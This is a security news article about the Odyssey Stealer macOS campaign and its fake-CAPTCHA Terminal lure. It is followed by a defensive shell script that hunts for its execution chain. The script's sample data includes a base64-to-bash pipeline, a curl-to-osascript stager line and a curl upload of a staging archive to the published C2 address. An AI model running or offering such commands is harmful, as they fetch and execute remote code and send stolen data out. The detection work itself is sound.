New ‘Odyssey Stealer’ Malware Hijacks macOS, Steals Crypto with ClickFix
Researchers at Forcepoint X-Labs have identified a new malware campaign targeting macOS users. The attack employs an enhanced ClickFix technique—combining phishing with social engineering—to steal data from cryptocurrency wallets, browser accounts, and confidential files.
Discovered in August 2025, the malware—dubbed Odyssey Stealer—is an evolution of earlier ClickFix attacks previously aimed at Windows systems and is now deployed against Apple devices through fraudulent CAPTCHA verification pages.
Hosted on the domain tradingviewen[.]com, the scheme mimics a standard “I’m not a robot” check but first detects the visitor’s operating system so it can serve instructions tailored to it. macOS users are prompted to open Spotlight Search, launch the Terminal, and paste a prewritten command. That command decodes a Base64-encoded string and then downloads and executes a heavily obfuscated AppleScript from a remote server. The whole sequence is dressed up as a legitimate procedure (entering a “verification code” and then the system password), while in reality the pasted command hands the malware the user’s password and, with it, privileged access to the machine.
Once executed, the AppleScript performs extensive data collection: harvesting data from the Electrum, Exodus, Litecoin, and Wasabi cryptocurrency wallets; extracting cookies, saved logins, autofill data, and form histories from Chromium-based browsers; copying .txt, .pdf, .docx, and .key documents from the Desktop and Documents folders; and exporting Safari cookies, Apple Notes, and Keychain files. To target crypto assets further, it also scans browser local storage and IndexedDB for wallet extensions and user profiles.
The malware employs multi-layered obfuscation and random string generation to hinder analysis. All collected data is packaged into /tmp/out.zip and exfiltrated via curl to the command-and-control server at 45.146.130[.]131/log. The same host runs the Odyssey Stealer control panel, where the attackers access the stolen data. After exfiltration, the malware deletes its temporary directories and the archive to minimize forensic traces and complicate investigation.
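A defender reading the two paragraphs above will want something that turns the described execution chain (Base64 decoded straight into a shell, curl output piped into osascript, the /tmp/out.zip staging file, the curl upload to the C2 host) into a quick hunt. The script below is an added example written for this page; it is not code from the Forcepoint X-Labs report or from the malware. The only indicators it takes from the article are the C2 address 45.146.130[.]131 and the archive path /tmp/out.zip; the rule names, the regular expressions, the sample command lines, and the 203.0.113.10 stager URL in the sample are constructed for illustration.

```shell
#!/bin/sh
# Added detection example, not code from the Forcepoint X-Labs report.
# Scans a text file of process command lines (one per line, as exported
# from an EDR, a shell history file, or `log show` output) for the
# ClickFix / Odyssey Stealer execution pattern described in the article.

# Indicators published in the article. The rule names and regexes below
# are this example's own heuristics, not the report's signatures.
ODYSSEY_C2='45.146.130.131'
ODYSSEY_ARCHIVE='/tmp/out.zip'

# Usage: scan_clickfix FILE
# Prints "RULE<TAB>command line" for every suspicious line.
scan_clickfix() {
    while IFS= read -r line || [ -n "$line" ]; do
        rule=''
        # 1. base64 decode piped straight into a shell or osascript: the
        #    Terminal paste step of the ClickFix lure.
        if printf '%s\n' "$line" | grep -qE 'base64[[:space:]]+(-d|-D|--decode)[^|]*\|[[:space:]]*(bash|sh|zsh|osascript)'; then
            rule='B64_EXEC'
        # 2. curl output handed directly to an interpreter: the remote
        #    AppleScript stager.
        elif printf '%s\n' "$line" | grep -qE 'curl[^|]*\|[[:space:]]*(osascript|bash|sh|zsh)'; then
            rule='FETCH_RUN'
        # 3. the published C2 host (exfiltration via curl to /log).
        elif printf '%s\n' "$line" | grep -qF "$ODYSSEY_C2"; then
            rule='C2_IP'
        # 4. the staging archive that the AppleScript deletes after upload.
        elif printf '%s\n' "$line" | grep -qF "$ODYSSEY_ARCHIVE"; then
            rule='STAGING'
        fi
        if [ -n "$rule" ]; then
            printf '%s\t%s\n' "$rule" "$line"
        fi
    done < "$1"
}

# Number of suspicious lines in FILE (handy for a scheduled check).
count_clickfix_hits() {
    scan_clickfix "$1" | wc -l | tr -d ' '
}

# Constructed sample written to FILE: four lines shaped like the campaign,
# three benign ones. The Base64 payload decodes to the harmless "echo hi",
# and 203.0.113.10 is a documentation address, not the real stager.
write_sample() {
    cat > "$1" <<'EOF'
ls -la /Users/alice/Documents
/bin/bash -c "echo ZWNobyBoaQ== | base64 -d | bash"
curl -fsSL http://203.0.113.10/a.txt | osascript
git log --oneline -n 5
curl -F "file=@/tmp/out.zip" http://45.146.130.131/log
rm -rf /tmp/out.zip
echo aGVsbG8= | base64 -d > /tmp/greeting.txt
EOF
}

# Run with --demo to see the four hits printed against the sample.
if [ "${1:-}" = "--demo" ]; then
    tmp="$(mktemp)"
    write_sample "$tmp"
    scan_clickfix "$tmp"
    rm -f "$tmp"
fi
```

The last sample line (a Base64 decode redirected to a file rather than piped into an interpreter) is deliberately left unflagged: the signal in ClickFix is decode-then-execute in one pipeline, and a rule that fires on every `base64 -d` will drown the analyst in noise. Because the malware deletes /tmp/out.zip after upload, the STAGING and C2_IP rules are only useful against historical telemetry (process events, shell history, proxy logs), not against a live disk.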
Odyssey Stealer demonstrates how familiar web interface elements such as a CAPTCHA can be weaponized for highly targeted attacks once they are used to steer the user, proving once again that macOS’s reputation for strong security is no safeguard against a user who can be talked into pasting a command into the Terminal.